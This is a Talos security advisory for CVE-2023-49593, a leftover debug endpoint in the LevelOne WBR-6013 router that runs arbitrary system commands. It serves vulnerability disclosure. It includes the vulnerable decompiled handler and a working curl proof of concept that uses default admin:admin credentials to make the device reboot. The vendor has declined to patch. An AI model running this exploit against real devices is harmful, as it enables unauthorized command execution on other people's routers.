Talos Vulnerability Report

TALOS-2023-1873

LevelOne WBR-6013 boa formSysCmd leftover debug code vulnerability

July 8, 2024
CVE Number

CVE-2023-49593

SUMMARY

Leftover debug code exists in the boa formSysCmd functionality of LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623. A specially crafted network request can lead to arbitrary command execution.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623

PRODUCT URLS

WBR-6013 - https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-489 - Leftover Debug Code

DETAILS

The WBR-6013 is a SOHO wireless router produced by LevelOne.

The WBR-6013 router has a web server called boa. The version used in the device is a Realtek’SDK that uses boa. One of the SDK’s API is /boafrm/formSysCmd. This is allegedly a debugging functionality that allows execution of arbitrary commands in the linux system running on the device. Supposedly, this functionality has not been removed prior to release, as there is no documented functionality to execute commands in the linux system. Following the formSysCmd that handles the /boafrm/formSysCmd API:

void formSysCmd(void *wp)

{
    [...]
    
    uVar1 = get_request_param(wp,"submit-url","");
    syscmd_ptr = (char *)get_request_param(wp,"sysCmd","");
    if (*syscmd_ptr != '\0') {
        sprintf(command_buff,100,"%s 2>&1 > %s",syscmd_ptr,"/tmp/syscmd.log");
        system(command_buff);
    }
    [...]
}

An attacker able to reach this API would be able to execute arbitrary commands in the device.

Exploit Proof of Concept

To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:

curl --user admin:admin http://<DEVICE_IP>/syscmd.htm &>/dev/null

After this request it is possible to use the /boafrm/formSysCmd API:

curl -d "sysCmd=reboot" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formSysCmd

After the request the device will reboot. The POC uses the default admin credentials.

VENDOR RESPONSE

LevelOne has declined to patch the issues in their software.

TIMELINE

2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-07-08 - Public Release

Credit

Discovered by Francesco Benvenuto of Cisco Talos.

TALOS-2023-1872

TALOS-2023-1874